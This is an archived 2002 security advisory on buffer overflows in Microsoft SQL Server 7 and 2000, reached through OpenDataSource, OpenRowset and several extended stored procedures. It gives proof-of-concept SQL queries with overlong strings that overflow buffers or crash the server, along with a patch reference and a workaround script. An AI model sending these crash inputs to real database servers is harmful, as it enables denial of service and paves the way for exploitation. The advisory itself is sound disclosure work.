25th Feb 2002 [SBWID-5126]
COMMAND
Sql Server buffer overflow
SYSTEMS AFFECTED
MSDE, Sql Server 7, Sql Server 2000
PROBLEM
In Cesar Cerrudo advisory [CC020201] [CC030202] :
--snip--
OpenDataSource and OpenRowset functions are accessible to all users and
contain an unchecked buffer in one of its parameters. The buffer
overflow and DOS problem ocurr when an overly long string is supplied
in the "provider name" parameter.
In Sql server 7 overflow starts at character number 6819 and if the
amount of characteres is >= 6918 the server will crash :
SELECT *
FROM OpenDataSource(
'XXXXXXXXXXX...' ---> 6819 characteres or more
,'')...nothing
SELECT * FROM OPENROWSET(
'XXXXXXXXXXX...' ---> 6819 characteres or more
,'',
'')
In Sql server 2000 overflow starts at character number 6887 and if the
amount of characteres is >= 6998 the server will crash :
SELECT *
FROM OpenDataSource(
'XXXXXXXXXXX...' ---> 6887 characteres or more
,'')...nothing
SELECT * FROM OPENROWSET(
'XXXXXXXXXXX...' ---> 6887 characteres or more
,'',
'')
Depend on de amount of characters some registry values are overwriten.
Try with this examples and then take a look at the dump file.
--snap--
Update (06 March 2002)
======
-Also-
The extended store procedure xp_dirtree allows to ALL users to retrieve
the subdirectory structure of a given drive o folder. A buffer overflow
ocurr when an overly long string is supplied :
xp_dirtree 'XXXXXX...'----> many, many X's
or as unicode :
xp_dirtree N'XXXXXX...'----> many, many X's
Update (14 March 2002)
======
Get full details from :
http://www.appsecinc.com/resources/alerts/mssql/02-0000.html
The following are also at cause :
xp_controlqueueservice
xp_createprivatequeue
xp_createqueue
xp_decodequeuecmd
xp_deleteprivatequeue
xp_deletequeue
xp_displayqueuemesgs
xp_dsninfo
xp_mergelineages
xp_oledbinfo
xp_proxiedmetadata
xp_readpkfromqueue
xp_readpkfromvarbin
xp_repl_encrypt
xp_resetqueue
xp_sqlinventory
xp_unpackcab
Sample :
======
xp_proxiedmetadata
Versions vulnerable: SQL Server 2000 and SQL Server 7.0 (xprepl.dll)
Default permissions granted: public
Overflow occurred for Unicode buffers
Code examples:
-- overflow on both SQL Server 7 and 2000 when a Unicode-buffer greater than
4000 characters is passed as the first parameter
xp_proxiedmetadata N'AAAAAAAAAA[4000+]', '', '', ''
xp_mergelineages
Versions vulnerable: SQL Server 2000 (xprepl.dll)
Default permissions granted: public
Overflow occurred for Unicode buffers
Code examples:
-- buffer overflow with a Unicode-buffer of more than 4000 characters is
passed into the first parameter
xp_mergelineages N'AAAAAAAAAA[4000+]', '', ''
SOLUTION
Patch (update 25 July 2002)
=====
See : http://www.microsoft.com/technet/security/bulletin/ms02-038.asp
Workaround
==========
Drop the extended store procedure and its DLL for second bug. To remove
these extended stored procedures from Microsoft SQL Server 2000, run
the following script:
use master
go
drop procedure xp_decodequeuecmd
go
drop procedure xp_controlqueueservice
go
drop procedure xp_createprivatequeue
go
drop procedure xp_createqueue
go
drop procedure xp_deleteprivatequeue
go
drop procedure xp_deletequeue
go
drop procedure xp_displayqueuemesgs
go
drop procedure xp_mergelineages
go
drop procedure xp_oledbinfo
go
drop procedure xp_proxiedmetadata
go
drop procedure xp_readpkfromqueue
go
drop procedure xp_readpkfromvarbin
go
drop procedure xp_repl_encrypt
go
drop procedure xp_resetqueue
go
drop procedure xp_unpackcab
go
To remove these extended stored procedures from Microsoft SQL Server
7.0, run the following script:
use master
go
drop procedure xp_repl_encrypt
go
drop procedure xp_oledbinfo
go
drop procedure xp_dsninfo
go
drop procedure xp_proxiedmetadata
go
drop procedure xp_sqlinventory
go
TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2025 AOH
